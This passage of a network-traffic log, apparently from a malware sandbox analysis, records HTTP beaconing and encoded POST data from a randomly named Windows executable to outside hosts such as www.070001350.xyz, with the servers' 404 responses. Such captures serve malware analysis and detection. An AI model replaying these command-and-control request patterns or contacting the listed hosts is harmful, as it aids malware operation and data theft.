                              Sep 16, 2024 09:32:40.085858107 CEST1236INData Raw: 0d d9 76 42 23 25 5c f8 4c 3c 46 a1 1d e8 63 c6 64 aa 1b 54 fc 0c 3f d6 6d f8 a1 ff 62 a7 ff dd d8 bb b8 7f d7 0c fa 93 ef bf bf b4 7b 2e fe e1 78 d2 b4 4f 6f ee 69 e3 78 60 8f df a0 76 8d c1 ff de c4 76 80 3a f5 af 90 33 fd 86 4b 67 c8 e8 ed 60
                              Data Ascii: vB#%\L<FcdT?mb{.xOoix`vv:3Kg`W6t".vh27wyE/>^^oy{{:x3L>7}:3,8u+x?N'0io;w[}yo//QKaJKe
                              Sep 16, 2024 09:32:40.085870028 CEST448INData Raw: 1e bf 16 f0 ba eb 99 98 c7 b7 03 cb 63 b3 30 e1 61 3b b1 83 cb cf 12 32 0c 3c 0d 60 92 cb b9 bc 78 c5 73 39 69 c9 10 7d e4 1b 8b e9 5a 65 1a 86 4c 5e 98 a8 06 9f 12 01 13 7c 89 f0 2c 12 ea 2b 2a 05 8d 70 87 75 fe 14 17 f3 48 68 c4 dd 79 2d bc c6
                              Data Ascii: c0a;2<`xs9i}ZeL^|,+*puHhy-3DJ#{.m )Ar;6I i2;wJiGN`8)K6[h%<7L4w[u(`j\k`(ly6s:06oSGt22iY
                              Sep 16, 2024 09:32:40.085875988 CEST1236INData Raw: 82 39 5a 4e ca 9a 62 2e 15 9d c6 e8 6c 49 1c ca da 58 fc ea e1 db 93 cf b9 af 15 f9 cf 65 7b cc f2 a1 c9 98 9d 28 17 b0 07 1c df 3a b7 b5 95 e8 cb 91 01 61 01 1d b9 f8 f7 1c fe 97 13 fb 2e a2 39 12 08 17 dd 80 82 8d 68 c2 c1 79 66 36 3e 9b c0 1a
                              Data Ascii: 9ZNb.lIXe{(:a.9hyf6>_n^J;z;9LlKk[CCm3uE(rn5J>7G7r9eBX)GSS~z8mDV(VXoeWir"SYM>"M8,S^YHM)u%
                              Sep 16, 2024 09:32:40.085884094 CEST680INData Raw: b7 5f ae 4f 96 cf 77 46 a5 95 12 a7 7c 24 bb 52 ff fe 82 6e 1f eb eb d3 52 82 97 5c 3b 31 6f 58 b8 cd e6 24 44 8f d9 2e e2 d3 11 2b 5d 49 25 8f cd 2a c2 b6 1e 5e 44 32 a0 17 4d ad b2 ce ac 46 3c 46 01 03 94 c1 67 ee 75 64 6e 69 63 5d 51 cf 6a c4
                              Data Ascii: _OwF|$RnR\;1oX$D.+]I%*^D2MF<Fgudnic]QjmQT}@V,C&,b|]KUmA+Pt<3\+4gk#3bd\MnhBGI|L5LHt jJ>=PovEG


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              44192.168.2.554915185.104.29.1280728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:32:41.683321953 CEST462OUTGET /kdsf/?bX=mrPbX6f2ANh6eH6BaYBcOaExirfKelxT8B/s11FteNVWpCBC/Ng1kYBANMlCHLb8Vm1KElmPNEHDJkuYfrXhfpk22msKwfJUhUP/5Z9IMLZY9GQtDtvdXiZeiMyh2YwcFA==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.groet.online
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:32:42.501647949 CEST1236INHTTP/1.1 404 Not Found
                              date: Mon, 16 Sep 2024 07:32:42 GMT
                              x-powered-by: PHP/8.3.8
                              cache-control: must-revalidate, no-cache, private
                              x-drupal-dynamic-cache: HIT
                              content-language: en
                              x-content-type-options: nosniff
                              x-frame-options: SAMEORIGIN
                              expires: Sun, 19 Nov 1978 05:00:00 GMT
                              x-generator: Drupal 10 (https://www.drupal.org)
                              x-drupal-cache: MISS
                              vary: Origin,Accept-Encoding,User-Agent
                              upgrade: h2,h2c
                              connection: Upgrade
                              content-length: 24869
                              content-type: text/html; charset=UTF-8
                              server: Apache
                              Data Raw: 0a 0a 3c 21 2d 2d 20 54 48 45 4d 45 20 44 45 42 55 47 20 2d 2d 3e 0a 3c 21 2d 2d 20 54 48 45 4d 45 20 48 4f 4f 4b 3a 20 27 68 74 6d 6c 27 20 2d 2d 3e 0a 3c 21 2d 2d 20 46 49 4c 45 20 4e 41 4d 45 20 53 55 47 47 45 53 54 49 4f 4e 53 3a 0a 20 20 20 e2 96 aa ef b8 8f 20 68 74 6d 6c 2d 2d 6b 64 73 66 2e 68 74 6d 6c 2e 74 77 69 67 0a 20 20 20 e2 9c 85 20 68 74 6d 6c 2e 68 74 6d 6c 2e 74 77 69 67 0a 2d 2d 3e 0a 3c 21 2d 2d 20 f0 9f 92 a1 20 42 45 47 49 4e 20 43 55 53 54 4f 4d 20 54 45 4d 50 4c 41 54 45 20 4f 55 54 50 55 54 20 66 72 6f 6d 20 27 63 6f 72 65 2f 74 68 65 6d 65 73 2f 6f 6c 69 76 65 72 6f 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 61 79 6f 75 74 2f 68 74 6d 6c 2e 68 74 6d 6c 2e 74 77 69 67 27 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 73 74 79 6c 65 3d 22 2d 2d 63 6f 6c 6f 72 2d 2d 70 72 69 6d 61 72 79 2d 68 75 65 3a 32 30 32 3b 2d 2d 63 6f 6c 6f 72 2d 2d 70 72 69 6d 61 72 79 2d 73 61 74 75 72 61 74 69 6f [TRUNCATED]
                              Data Ascii: ... THEME DEBUG -->... THEME HOOK: 'html' -->... FILE NAME SUGGESTIONS: html--kdsf.html.twig html.html.twig-->... BEGIN CUSTOM TEMPLATE OUTPUT from 'core/themes/olivero/templates/layout/html.html.twig' --><!DOCTYPE html><html lang="en" dir="ltr" style="--color--primary-hue:202;--color--primary-saturation:79%;--color--primary-lightness:50"> <head> <meta charset="utf-8" /><meta name="Generator" content="Drupal 10 (https://www.drupal.org)" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="icon" href="/core/themes/olivero/favicon.ico" type
                              Sep 16, 2024 09:32:42.501672029 CEST1236INData Raw: 3d 22 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 22 20 2f 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 7c 20 47 72 6f 65 74 2e 4f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0a 20
                              Data Ascii: ="image/vnd.microsoft.icon" /> <title>Page not found | Groet.Online</title> <link rel="stylesheet" media="all" href="/sites/default/files/css/css_q0l-YMB5MRfoTzN2tMgVVUlEneWGg2lLvzs1GSlfJa8.css?delta=0&amp;language=en&amp;theme=oliver
                              Sep 16, 2024 09:32:42.501725912 CEST1236INData Raw: 73 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 6e 61 76 69 67 61 74 69 6f 6e 2f 6e 61 76 2d 70 72 69 6d 61 72 79 2d 6e 6f 2d 6a 73 2e 63 73 73 3f 73 6a 76 32 30 74 22 20 2f 3e 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c
                              Data Ascii: s/components/navigation/nav-primary-no-js.css?sjv20t" /></noscript> </head> <body class="path-kdsf"> <a href="#main-content" class="visually-hidden focusable skip-link"> Skip to main content </a> ... THEME DE
                              Sep 16, 2024 09:32:42.501739025 CEST672INData Raw: 64 65 72 22 20 61 72 69 61 2d 63 68 65 63 6b 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 69 63 6b 79 2d 68 65 61 64 65 72 2d 74 6f 67 67 6c 65 5f 5f 69 63 6f 6e 22 3e
                              Data Ascii: der" aria-checked="false"> <span class="sticky-header-toggle__icon"> <span></span> <span></span> <span></span> </span> </button> </div>
                              Sep 16, 2024 09:32:42.501784086 CEST1236INData Raw: 65 72 2e 68 74 6d 6c 2e 74 77 69 67 27 20 2d 2d 3e 0a 0a 0a 0a 3c 21 2d 2d 20 54 48 45 4d 45 20 44 45 42 55 47 20 2d 2d 3e 0a 3c 21 2d 2d 20 54 48 45 4d 45 20 48 4f 4f 4b 3a 20 27 62 6c 6f 63 6b 27 20 2d 2d 3e 0a 3c 21 2d 2d 20 46 49 4c 45 20 4e
                              Data Ascii: er.html.twig' -->... THEME DEBUG -->... THEME HOOK: 'block' -->... FILE NAME SUGGESTIONS: block--header--id--olivero-site-branding.html.twig block--header--plugin-id--system-branding-block.html.twig block
                              Sep 16, 2024 09:32:42.501799107 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 62 75 74 74 6f 6e 73 22 20 64 61 74 61 2d 64 72 75 70 61 6c 2d 73 65 6c 65 63 74 6f 72 3d 22 6d 6f 62 69 6c 65 2d 62 75 74 74 6f 6e 73 22 3e 0a 20 20 20 20 20 20
                              Data Ascii: <div class="mobile-buttons" data-drupal-selector="mobile-buttons"> <button class="mobile-nav-button" data-drupal-selector="mobile-nav-button" aria-label="Main Menu" aria-controls="header-nav" aria-expanded="false">
                              Sep 16, 2024 09:32:42.501812935 CEST448INData Raw: f0 9f 92 a1 20 42 45 47 49 4e 20 43 55 53 54 4f 4d 20 54 45 4d 50 4c 41 54 45 20 4f 55 54 50 55 54 20 66 72 6f 6d 20 27 63 6f 72 65 2f 74 68 65 6d 65 73 2f 6f 6c 69 76 65 72 6f 2f 74 65 6d 70 6c 61 74 65 73 2f 62 6c 6f 63 6b 2f 62 6c 6f 63 6b 2d
                              Data Ascii: BEGIN CUSTOM TEMPLATE OUTPUT from 'core/themes/olivero/templates/block/block--primary-menu--plugin-id--search-form-block.html.twig' --><div class="search-block-form block block-search-narrow" data-drupal-selector="search-block-form" id="
                              Sep 16, 2024 09:32:42.501823902 CEST1236INData Raw: 2e 74 77 69 67 0a 20 20 20 e2 96 aa ef b8 8f 20 66 6f 72 6d 2e 68 74 6d 6c 2e 74 77 69 67 0a 2d 2d 3e 0a 3c 21 2d 2d 20 f0 9f 92 a1 20 42 45 47 49 4e 20 43 55 53 54 4f 4d 20 54 45 4d 50 4c 41 54 45 20 4f 55 54 50 55 54 20 66 72 6f 6d 20 27 63 6f
                              Data Ascii: .twig form.html.twig-->... BEGIN CUSTOM TEMPLATE OUTPUT from 'core/themes/olivero/templates/form--search-block-form.html.twig' --><form action="/search/node" method="get" id="search-block-form" accept-charset="UTF-8" class="
                              Sep 16, 2024 09:32:42.501836061 CEST1236INData Raw: 79 73 22 20 6e 61 6d 65 3d 22 6b 65 79 73 22 20 76 61 6c 75 65 3d 22 22 20 73 69 7a 65 3d 22 31 35 22 20 6d 61 78 6c 65 6e 67 74 68 3d 22 31 32 38 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 73 65 61 72 63 68 20 66 6f 72 6d 2d 65 6c 65 6d 65 6e 74
                              Data Ascii: ys" name="keys" value="" size="15" maxlength="128" class="form-search form-element form-element--type-search form-element--api-search" />... END OUTPUT from 'core/modules/system/templates/input.html.twig' --> </div>... END OUTP
                              Sep 16, 2024 09:32:42.501847982 CEST1236INData Raw: 20 66 72 6f 6d 20 27 63 6f 72 65 2f 74 68 65 6d 65 73 2f 6f 6c 69 76 65 72 6f 2f 74 65 6d 70 6c 61 74 65 73 2f 66 6f 72 6d 2f 69 6e 70 75 74 2d 2d 73 75 62 6d 69 74 2d 2d 68 65 61 64 65 72 2d 73 65 61 72 63 68 2e 68 74 6d 6c 2e 74 77 69 67 27 20
                              Data Ascii: from 'core/themes/olivero/templates/form/input--submit--header-search.html.twig' --></div>... END OUTPUT from 'core/modules/system/templates/container.html.twig' --></form>... END CUSTOM TEMPLATE OUTPUT from 'core/themes/olivero/te
                              Sep 16, 2024 09:32:42.508018017 CEST1236INData Raw: 62 6c 6f 63 6b 5f 5f 74 69 74 6c 65 22 20 69 64 3d 22 62 6c 6f 63 6b 2d 6f 6c 69 76 65 72 6f 2d 6d 61 69 6e 2d 6d 65 6e 75 2d 6d 65 6e 75 22 3e 4d 61 69 6e 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 68 32 3e 0a 20 20 0a 20 20 20 20 20 20 20 20 0a 0a
                              Data Ascii: block__title" id="block-olivero-main-menu-menu">Main navigation</h2> ... THEME DEBUG -->... THEME HOOK: 'menu__main' -->... FILE NAME SUGGESTIONS: menu--main.html.twig menu--primary-menu.html.twig m


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              45192.168.2.55491665.21.196.9080728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:32:47.723521948 CEST727OUTPOST /ivyl/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.070001350.xyz
                              Origin: http://www.070001350.xyz
                              Referer: http://www.070001350.xyz/ivyl/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 63 31 34 54 32 31 65 32 45 48 2b 2b 78 32 6a 43 65 49 31 65 48 49 67 76 48 5a 43 4e 63 7a 78 71 47 63 66 67 62 6f 34 44 6f 68 38 53 44 66 33 74 72 59 32 55 78 65 43 71 39 42 75 69 2b 37 53 33 51 37 49 72 48 38 74 77 57 71 43 69 5a 6a 30 4f 79 32 41 74 54 34 59 58 31 45 56 42 73 66 6e 2b 58 30 6e 39 49 4d 6e 68 4e 52 66 78 6d 69 4f 66 6b 4e 52 46 36 69 51 34 36 4f 6d 48 76 37 74 6a 67 30 39 56 59 72 62 35 48 41 36 57 67 6d 70 53 62 32 46 4f 66 4b 35 68 35 51 37 58 4e 2b 4a 61 4b 39 76 53 59 59 39 52 79 42 36 32 75 2b 72 78 4d 57 31 30 65 58 54 4a 30 67 53 71 32 69 68 77 37 2f 6d 36 41 31 49 3d
                              Data Ascii: bX=c14T21e2EH++x2jCeI1eHIgvHZCNczxqGcfgbo4Doh8SDf3trY2UxeCq9Bui+7S3Q7IrH8twWqCiZj0Oy2AtT4YX1EVBsfn+X0n9IMnhNRfxmiOfkNRF6iQ46OmHv7tjg09VYrb5HA6WgmpSb2FOfK5h5Q7XN+JaK9vSYY9RyB62u+rxMW10eXTJ0gSq2ihw7/m6A1I=
                              Sep 16, 2024 09:32:48.381959915 CEST1032INHTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:32:48 GMT
                              vary: User-Agent
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              46192.168.2.55491765.21.196.9080728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:32:50.265780926 CEST747OUTPOST /ivyl/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.070001350.xyz
                              Origin: http://www.070001350.xyz
                              Referer: http://www.070001350.xyz/ivyl/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 63 31 34 54 32 31 65 32 45 48 2b 2b 77 58 7a 43 53 4c 74 65 51 34 67 75 43 5a 43 4e 53 54 78 75 47 63 54 67 62 70 38 31 6f 53 55 53 43 2b 48 74 71 63 69 55 77 65 43 71 70 52 75 37 78 62 53 73 51 37 4d 6a 48 35 46 77 57 71 57 69 5a 6d 59 4f 79 46 59 75 63 49 59 52 7a 45 56 48 7a 50 6e 2b 58 30 6e 39 49 4d 44 62 4e 56 37 78 6d 53 2b 66 32 63 52 4b 77 43 51 37 75 65 6d 48 72 37 74 6e 67 30 38 6c 59 70 2f 66 48 43 79 57 67 6e 5a 53 62 6e 46 50 4d 71 34 71 6e 51 36 57 43 4d 34 6c 46 38 2f 6b 62 65 67 6f 69 48 4f 43 6d 6f 47 62 57 30 39 63 4e 33 2f 78 6b 7a 61 64 6e 53 41 5a 68 63 32 4b 65 69 66 47 69 53 59 62 39 65 51 35 74 54 4b 39 4f 63 44 54 45 74 31 44
                              Data Ascii: bX=c14T21e2EH++wXzCSLteQ4guCZCNSTxuGcTgbp81oSUSC+HtqciUweCqpRu7xbSsQ7MjH5FwWqWiZmYOyFYucIYRzEVHzPn+X0n9IMDbNV7xmS+f2cRKwCQ7uemHr7tng08lYp/fHCyWgnZSbnFPMq4qnQ6WCM4lF8/kbegoiHOCmoGbW09cN3/xkzadnSAZhc2KeifGiSYb9eQ5tTK9OcDTEt1D
                              Sep 16, 2024 09:32:50.929989100 CEST1032INHTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:32:50 GMT
                              vary: User-Agent
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              47192.168.2.55491865.21.196.9080728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:32:52.817351103 CEST1764OUTPOST /ivyl/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.070001350.xyz
                              Origin: http://www.070001350.xyz
                              Referer: http://www.070001350.xyz/ivyl/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 63 31 34 54 32 31 65 32 45 48 2b 2b 77 58 7a 43 53 4c 74 65 51 34 67 75 43 5a 43 4e 53 54 78 75 47 63 54 67 62 70 38 31 6f 53 4d 53 44 4e 66 74 73 2b 4b 55 7a 65 43 71 31 68 75 6d 78 62 53 68 51 37 30 6e 48 35 42 67 57 70 75 69 5a 41 4d 4f 6a 51 73 75 48 59 59 52 2b 6b 56 47 73 66 6d 38 58 30 33 78 49 4d 54 62 4e 56 37 78 6d 55 53 66 6d 39 52 4b 2f 69 51 34 36 4f 6d 44 76 37 74 50 67 33 4e 64 59 70 37 70 47 78 4b 57 6c 33 4a 53 65 52 52 50 50 4b 34 6f 69 51 37 46 43 4d 30 45 46 38 6a 53 62 65 38 4f 69 41 36 43 32 75 33 64 54 6b 4e 64 4f 6d 58 42 6a 68 36 76 35 55 46 67 75 2b 4f 4a 65 79 50 34 6c 52 6f 55 2b 61 30 66 71 48 62 36 54 4c 66 44 57 59 34 5a 56 55 46 7a 46 74 79 4c 73 48 73 76 45 36 68 33 76 34 63 6f 6d 4a 37 4d 4b 64 33 71 59 55 76 57 2f 54 44 50 6c 4b 2b 4a 77 76 6c 53 4f 53 44 51 34 51 58 42 63 65 36 57 76 57 57 61 74 69 48 35 56 66 2f 4d 58 62 4a 2f 6d 78 52 6b 4a 76 54 72 2b 52 38 78 76 69 41 45 70 37 58 56 59 48 4f 76 66 36 59 39 38 45 43 73 39 65 51 63 45 63 70 61 37 79 76 [TRUNCATED]
                              Data Ascii: bX=c14T21e2EH++wXzCSLteQ4guCZCNSTxuGcTgbp81oSMSDNfts+KUzeCq1humxbShQ70nH5BgWpuiZAMOjQsuHYYR+kVGsfm8X03xIMTbNV7xmUSfm9RK/iQ46OmDv7tPg3NdYp7pGxKWl3JSeRRPPK4oiQ7FCM0EF8jSbe8OiA6C2u3dTkNdOmXBjh6v5UFgu+OJeyP4lRoU+a0fqHb6TLfDWY4ZVUFzFtyLsHsvE6h3v4comJ7MKd3qYUvW/TDPlK+JwvlSOSDQ4QXBce6WvWWatiH5Vf/MXbJ/mxRkJvTr+R8xviAEp7XVYHOvf6Y98ECs9eQcEcpa7yvq4QVDkLMo/2oCk19XYJtI3wjBrmfB9/UrWRhOINSD6UrjFxy3A9v8a5quGX/ZpXTz+UaE7/0NBgSW9+R9JsFhYSgLvG0/WuoqpCUTTTDkgHBxs6oakMnBr1Zs6fqbYsPXKNpX+1ex6t4Ro45DYoR4sXiazR9FFzTaN6s5chQJMOMEnELBNJ1HDZlEPSZUZsgk7iGyHPZVuNoZmTZabXacjHXWVTTr04Rlv96QbPr6SwMHkw0imK1keEewG8LyoDYhUNASbVbyhVwPfnmg35SWXhUrJH605Rm3IHlule0lf8h+mhMczPanCf4n9nrxi97r2dJv9FB7IKKb2Wypt/qh3AgwiYHB7wZoCgttlpkSQkKGMbzc3MawLakPP3pYe7+kgtL/X2nBampYNZWXnO88V0rUe/tA0Mh2QrTaXjcn8mLd8kh3BvCFkfvetCbWGNM0Jj3KaE1+NTVu6hfGOWoMLa1fgARXEQockoi6ZudXP5KlzMlG8c3lRL2mCD/O57votVhllOx3TwPctCynPC16NjuuCegbQqnU0aj5ulsYjw9r17Z0xbj6YgqDlROi0N6egQBryPOq4KOe24CDNDbJzDw0HkhvMGNuueAN2CdnEkIAaTDcFPw25enKOW1g95DNW3SfSIbaswoVC75Nc27uK75uCQGY24N3n [TRUNCATED]
                              Sep 16, 2024 09:32:53.462506056 CEST1032INHTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:32:53 GMT
                              vary: User-Agent
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
